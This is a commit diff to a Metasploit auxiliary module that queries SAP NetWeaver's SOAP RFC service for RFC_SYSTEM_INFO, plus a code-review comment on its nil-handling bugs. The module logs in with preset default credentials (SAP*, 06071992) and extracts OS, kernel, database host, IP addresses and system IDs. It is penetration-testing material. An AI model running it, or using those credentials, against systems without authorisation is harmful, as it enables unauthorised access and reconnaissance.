final cleanup

unstable
jvazquez-r7 2012-11-18 00:32:20 +01:00
parent e72946303e
commit a35c640acf
1 changed files with 234 additions and 73 deletions


@ -26,25 +26,32 @@ class Metasploit4 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'SAP SOAP RFC_SYSTEM_INFO', 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering',
'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information. 'Description' => %q{'SAP NetWeaver could allow a remote attacker to obtain sensitive information.
By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker By sending a RFC_SYSTEM_INFO RfcCallReceive request to TCP port 33NN an attacker
could obtain the operating system version, SAP version, and real IP address of the server.}, could obtain the operating system version, SAP version, and real IP address of the server.},
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]], 'References' =>
'Author' => [ 'Agnivesh Sathasivam','nmonkee' ], [
'License' => BSD_LICENSE [ 'CVE', '2006-6010' ],
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
],
'Author' =>
[
'Agnivesh Sathasivam',
'nmonkee'
],
'License' => MSF_LICENSE
) )
register_options( register_options(
[ [
OptString.new('USERNAME', [false, 'username ', 'SAP*']), Opt::RPORT(8000),
OptString.new('PASSWORD', [false, 'password ', '06071992']), OptString.new('USERNAME', [true, 'Username', 'SAP*']),
OptString.new('CLIENT', [false, 'client ', '001']), OptString.new('PASSWORD', [true, 'Password', '06071992']),
], self.class) OptString.new('CLIENT', [true, 'Client ', '001']),
register_autofilter_ports([ 8000 ]) ], self.class)
end end
def run_host(ip) def run_host(ip)
success = false
client = datastore['CLIENT'] client = datastore['CLIENT']
data = '<?xml version="1.0" encoding="utf-8" ?>' data = '<?xml version="1.0" encoding="utf-8" ?>'
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
@ -76,73 +83,227 @@ class Metasploit4 < Msf::Auxiliary
if res and res.code != 500 and res.code != 200 if res and res.code != 500 and res.code != 200
# to do - implement error handlers for each status code, 404, 301, etc. # to do - implement error handlers for each status code, 404, 301, etc.
print_error("[SAP] #{ip}:#{rport} - something went wrong!") print_error("[SAP] #{ip}:#{rport} - something went wrong!")
return false return
else
success = true
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("[SAP] #{ip}:#{rport} - Unable to connect") print_error("[SAP] #{ip}:#{rport} - Unable to connect")
return false return
end end
if success print_status("[SAP] #{ip}:#{rport} - got response")
print_status("[SAP] #{ip}:#{rport} - got response") saptbl = Msf::Ui::Console::Table.new(
saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default,
Msf::Ui::Console::Table::Style::Default, 'Header' => "[SAP] System Info",
'Header' => "[SAP] System Info", 'Prefix' => "\n",
'Prefix' => "\n", 'Postfix' => "\n",
'Postfix' => "\n", 'Indent' => 1,
'Indent' => 1, 'Columns' =>[
'Columns' =>[ "Info",
"Info", "Value"
"Value" ])
]) response = res.body
response = res.body rfcproto = $1 if response =~ /<RFCPROTO>(.*)<\/RFCPROTO>/i
rfcproto = $1 if response =~ /<RFCPROTO>(.*)<\/RFCPROTO>/i rfcchartyp = $1 if response =~ /<RFCCHARTYP>(.*)<\/RFCCHARTYP>/i
rfcchartyp = $1 if response =~ /<RFCCHARTYP>(.*)<\/RFCCHARTYP>/i rfcinttyp = $1 if response =~ /<RFCINTTYP>(.*)<\/RFCINTTYP>/i
rfcinttyp = $1 if response =~ /<RFCINTTYP>(.*)<\/RFCINTTYP>/i rfcflotyp = $1 if response =~ /<RFCFLOTYP>(.*)<\/RFCFLOTYP>/i
rfcflotyp = $1 if response =~ /<RFCFLOTYP>(.*)<\/RFCFLOTYP>/i rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i
rfcdest = $1 if response =~ /<RFCDEST>(.*)<\/RFCDEST>/i rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i
rfchost = $1 if response =~ /<RFCHOST>(.*)<\/RFCHOST>/i rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i
rfcsysid = $1 if response =~ /<RFCSYSID>(.*)<\/RFCSYSID>/i rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i
rfcdatabs = $1 if response =~ /<RFCDATABS>(.*)<\/RFCDATABS>/i rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i
rfcdbhost = $1 if response =~ /<RFCDBHOST>(.*)<\/RFCDBHOST>/i rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i
rfcdbsys = $1 if response =~ /<RFCDBSYS>(.*)<\/RFCDBSYS>/i rfcmach = $1 if response =~ /<RFCMACH>(.*)<\/RFCMACH>/i
rfcsaprl = $1 if response =~ /<RFCSAPRL>(.*)<\/RFCSAPRL>/i rfcopsys = $1 if response =~ /<RFCOPSYS>(.*)<\/RFCOPSYS>/i
rfcmach = $1 if response =~ /<RFCMACH>(.*)<\/RFCMACH>/i rfctzone = $1 if response =~ /<RFCTZONE>(.*)<\/RFCTZONE>/i
rfcopsys = $1 if response =~ /<RFCOPSYS>(.*)<\/RFCOPSYS>/i rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i
rfctzone = $1 if response =~ /<RFCTZONE>(.*)<\/RFCTZONE>/i rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i
rfcdayst = $1 if response =~ /<RFCDAYST>(.*)<\/RFCDAYST>/i rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i
rfcipaddr = $1 if response =~ /<RFCIPADDR>(.*)<\/RFCIPADDR>/i rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i
rfckernrl = $1 if response =~ /<RFCKERNRL>(.*)<\/RFCKERNRL>/i saptbl << [ "Release Status of SAP System", rfcsaprl ]
rfchost2 = $1 if response =~ /<RFCHOST2>(.*)<\/RFCHOST2>/i saptbl << [ "RFC Log Version", rfcproto ]
rfcsi_resv = $1 if response =~ /<RFCSI_RESV>(.*)<\/RFCSI_RESV>/i saptbl << [ "Kernel Release", rfckernrl ]
rfcipv6addr = $1 if response =~ /<RFCIPV6ADDR>(.*)<\/RFCIPV6ADDR>/i saptbl << [ "Operating System", rfcopsys ]
saptbl << [ "Release Status of SAP System", rfcsaprl ] saptbl << [ "Database Host", rfcdbhost]
saptbl << [ "RFC Log Version", rfcproto ] saptbl << [ "Central Database System", rfcdbsys ]
saptbl << [ "Kernel Release", rfckernrl ] if rfcinttyp == 'LIT'
saptbl << [ "Operating System", rfcopsys ] saptbl << [ "Integer Format", "Little Endian" ]
saptbl << [ "Database Host", rfcdbhost] else
saptbl << [ "Central Database System", rfcdbsys ] saptbl << [ "Integer Format", "Big Endian" ]
if rfcinttyp == 'LIT'
saptbl << [ "Integer Format", "Little Endian" ]
else
saptbl << [ "Integer Format", "Big Endian" ]
end
saptbl << [ "Hostname", rfchost ]
if rfcflotyp == 'IE3'
saptbl << [ "Float Type Format", "IEEE" ]
else
saptbl << [ "Float Type Format", "IBM/370" ]
end
saptbl << [ "IPv4 Address", rfcipaddr ]
saptbl << [ "IPv6 Address", rfcipv6addr ]
saptbl << [ "System ID", rfcsysid ]
saptbl << [ "RFC Destination", rfcdest ]
saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ]
saptbl << [ "Character Set", rfcchartyp ]
saptbl << [ "Daylight Saving Time", rfcdayst ]
saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")]
print(saptbl.to_s)
end end
saptbl << [ "Hostname", rfchost ]
if rfcflotyp == 'IE3'
saptbl << [ "Float Type Format", "IEEE" ]
else
saptbl << [ "Float Type Format", "IBM/370" ]
end
saptbl << [ "IPv4 Address", rfcipaddr ]
saptbl << [ "IPv6 Address", rfcipv6addr ]
saptbl << [ "System ID", rfcsysid ]
saptbl << [ "RFC Destination", rfcdest ]
saptbl << [ "Timezone", "#{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)" ]
saptbl << [ "Character Set", rfcchartyp ]
saptbl << [ "Daylight Saving Time", rfcdayst ]
saptbl << [ "Machine ID", rfcmach.gsub(/\s+/, "")]
print(saptbl.to_s)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.release',
:data => "Release Status of SAP System: #{rfcsaprl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.rfc_log',
:data => "RFC Log Version: #{rfcproto}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'sap.version.kernel',
:data => "Kernel Release: #{rfckernrl}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:sname => 'sap',
:type => 'system.os',
:data => "Operating System: #{rfcopsys}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db.hostname',
:data => "Database Host: #{rfcdbhost}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.db_system',
:data => "Central Database System: #{rfcdbsys}"
)
if rfcinttyp == 'LIT'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Little Endian"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.endianness',
:data => "Integer Format: Big Endian"
)
end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.hostname',
:data => "Hostname: #{rfchost}"
)
if rfcflotyp == 'IE3'
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IEEE"
)
else
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.float_type',
:data => "Float Type Format: IBM/370"
)
end
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v4',
:data => "IPv4 Address: #{rfcipaddr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.ip.v6',
:data => "IPv6 Address: #{rfcipv6addr}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.instance',
:data => "System ID: #{rfcsysid}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.rfc.destination',
:data => "RFC Destination: #{rfcdest}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.timezone',
:data => "Timezone: #{rfctzone.gsub(/\s+/, "")} (diff from UTC in seconds)"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'system.charset',
:data => "Character Set: #{rfcchartyp}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.daylight_saving_time',
:data => "Daylight Saving Time: #{rfcdayst}"
)
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'sap.machine_id',
:data => "Machine ID: #{rfcmach.gsub(/\s+/, "")}"
)
end end
end end
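Review bot: Dropping the `success` flag in the second hunk lets a nil `res` fall through to `print_status("... got response")` and `res.body`, which raises NoMethodError; before this change a nil response left `success` false and the table code was skipped. The first condition of the hunk should reject the nil case explicitly, e.g. `if res.nil? or (res.code != 500 and res.code != 200)`, so the existing `print_error` / `return` path handles it. The same pattern applies to the `rfctzone.gsub` and `rfcmach.gsub` calls on the new side: each `$1` capture is nil when its tag is absent from the body, so `rfctzone.to_s.gsub(/\s+/, "")` (and likewise for `rfcmach`) would avoid a crash on a partial response. In the first hunk the description still says the request goes "to TCP port 33NN" while the module now registers `Opt::RPORT(8000)` and speaks SOAP over HTTP, and the `%q{'SAP` literal opens with a stray apostrophe; `%q{SAP NetWeaver ... By sending a RFC_SYSTEM_INFO request to the /sap/bc/soap/rfc SOAP service ...` would match the new behaviour. run_host begins in the first hunk and its body is split across both.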